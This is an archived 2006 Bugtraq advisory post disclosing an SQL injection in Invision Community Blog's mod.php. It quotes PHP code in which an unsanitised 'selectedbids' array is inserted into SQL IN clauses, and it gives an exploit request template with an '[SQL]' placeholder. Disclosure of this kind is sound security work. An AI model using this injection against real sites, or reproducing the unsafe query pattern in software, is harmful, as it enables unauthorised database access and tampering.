lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 5 May 2006 08:34:13 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: Invision Community Blog .. Bugs


[LEFT]
Invision Community Blog .. Bugs

SQL Injection :-

    Filename 	  :- mod.php
    Function name :- do_mmod()

The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->
* Arabic *
[/LEFT]
[RIGHT]
المتغير $ids غير مفلتر عن طريق الداله intval وهو بشكل مصفوفه .. لهذا السبب ممكن عمل ÷حقنه
[/RIGHT]
[LEFT]
[php]
$ids = array();
$ids = explode( ',', $this->ipsclass->input['selectedbids'] );

...

$ids = implode( ',', $ids );

...

$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), "blog_id IN ({$ids})" );
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );
$this->ipsclass->DB->simple_exec();

....

$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), "blog_id IN ({$ids})");
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );

....

[/php]
[/LEFT]
[RIGHT]
*الاستغلال*
[/RIGHT]
[LEFT]
Exploit :-

    GET ^
    	/IBP/index.php?
    POST ^
    	automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin
[/LEFT]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ